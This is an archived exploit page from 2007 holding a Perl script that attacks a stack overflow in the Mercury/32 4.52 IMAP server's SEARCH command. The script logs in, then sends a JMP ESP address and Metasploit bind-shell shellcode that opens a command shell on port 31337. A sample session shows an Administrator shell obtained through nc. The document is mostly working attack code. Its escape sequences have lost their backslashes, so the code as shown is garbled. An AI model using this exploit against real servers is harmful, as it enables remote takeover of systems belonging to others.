[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
# Published : 2007-09-19
# Author : void
# Previous Title : jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit
# Next Title : RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit
# Z:Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
# Found & Code by void# ph4nt0m.org
#
# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
# C: pst06 LOGIN void ph4nt0m.org
# S: pst06 OK LOGIN completed.
# C: pst06 SELECT INBOX
# S: * 0 EXISTS
# S: * 0 RECENT
# S: * FLAGS (Deleted Draft Seen Answered)
# S: * OK [UIDVALIDITY 1190225819] UID Validity
# S: * OK [UIDNEXT 1] Predicted next UID
# S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flag
# s
# S: pst06 OK [READ-WRITE] SELECT completed.
# [*] Send Evil Payload ...
# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P
#
# Z:Exp>nc -vv 127.0.0.1 31337
# DNS fwd/rev mismatch: localhost != GNU
# localhost [127.0.0.1] 31337 (?) open
# Microsoft Windows XP [?¡ã?|?¡À?? 5.1.2600]
# (C) ?¡ã?|???¡§???1?¡°?? 1985-2001 Microsoft Corp.
#
# e:MERCURY>whoami
# whoami
# Administrator
#
# e:MERCURY>
use strict;
use warnings;
use IO::Socket;
# Target IP
my $imap_host = shift || 127.0.0.1;
my $imap_port = shift || 143;
my $imap_user = shift || "void";
my $imap_pass = shift || "ph4nt0m.org";
my $banner =
" Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploitn".
" Found & Code by void#ph4nt0m.orgn".
"n";
my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";
my $jmpesp = "x12x45xfax7f"; # Windows 2000/xp/2003 CHS Universe
# /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
# bad char: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode =
"x31xc9x81xe9xb0xffxffxffxe8xffxffxffxffxc0x5ex81".
"x76x0exfaxd1xa5x6fx83xeexfcxe2xf4x06xbbx4ex22x12".
"x28x5ax90x05xb1x2ex03xdexf5x2ex2axc6x5axd9x6ax82".
"xd0x4axe4xb5xc9x2ex30xdaxd0x4ex26x71xe5x2ex6ex14".
"xe0x65xf6x56x55x65x1bxfdx10x6fx62xfbx13x4ex9bxc1".
"x85x81x47x8fx34x2ex30xdexd0x4ex09x71xddxeexe4xa5".
"xcdxa4x84xf9xfdx2exe6x96xf5xb9x0ex39xe0x7ex0bx71".
"x92x95xe4xbaxddx2ex1fxe6x7cx2ex2fxf2x8fxcdxe1xb4".
"xdfx49x3fx05x07xc3x3cx9cxb9x96x5dx92xa6xd6x5dxa5".
"x85x5axbfx92x1ax48x93xc1x81x5axb9xa5x58x40x09x7b".
"x3cxadx6dxafxbbxa7x90x2axb9x7cx66x0fx7cxf2x90x2c".
"x82xf6x3cxa9x82xe6x3cxb9x82x5axbfx9cxb9xdfx06x9c".
"x82x2cx8ex6fxb9x01x75x8ax16xf2x90x2cxbbxb5x3exaf".
"x2ex75x07x5ex7cx8bx86xadx2ex73x3cxafx2ex75x07x1f".
"x98x23x26xadx2ex73x3fxaex85xf0x90x2ax42xcdx88x83".
"x17xdcx38x05x07xf0x90x2axb7xcfx0bx9cxb9xc6x02x73".
"x34xcfx3fxa3xf8x69xe6x1dxbbxe1xe6x18xe0x65x9cx50".
"x2fxe7x42x04x93x89xfcx77xabx9dxc4x51x7axcdx1dx04".
"x62xb3x90x8fx95x5axb9xa1x86xf7x3exabx80xcfx6exab".
"x80xf0x3ex05x01xcdxc2x23xd4x6bx3cx05x07xcfx90x05".
"xe6x5axbfx71x86x59xecx3exb5x5axb9xa8x2ex75x07x15".
"x1fx45x0fxa9x2ex73x90x2axd1xa5x6f";
print $banner;
sleep(1);
my $sock = IO::Socket::INET->new( PeerHost=>$imap_host, PeerPort=>$imap_port, proto=>"tcp" ) or die "Connect error.n";
imap_recv("");
imap_send("pst06 LOGIN $imap_user $imap_passrn", "rv");
imap_send("pst06 SELECT INBOXrn", "rv");
my $payload = $cheers.$jmpesp.$shellcode;
print "[*] Send Evil Payload ...n";
imap_send("pst06 SEARCH ON $payloadrn", "");
sleep(1);
print "[+] Done! Check out cmdshell@$imap_host:31337. Good Luck :-Pn";
$sock->close();
sub imap_send
{
if($_[1] =~ /v/)
{
if(length($_[0])<=75)
{
print "C: ".$_[0];
}
else
{
print "C: ".substr($_[0], 0, 36)." ... ".substr($_[0], -36, -1)."n";
}
}
print $sock $_[0];
if($_[1] =~ /r/)
{
imap_recv(substr($_[0], 0, index($_[0], " ")+1));
}
}
sub imap_recv
{
while(<$sock>)
{
print "S: ".$_;
if($_ =~ /$_[0]OK/)
{ last; }
elsif($_ =~ /$_[0]NO|$_[0]BAD/ )
{ last; }
else
{ next; }
}
}
# www.Syue.com [2007-09-19]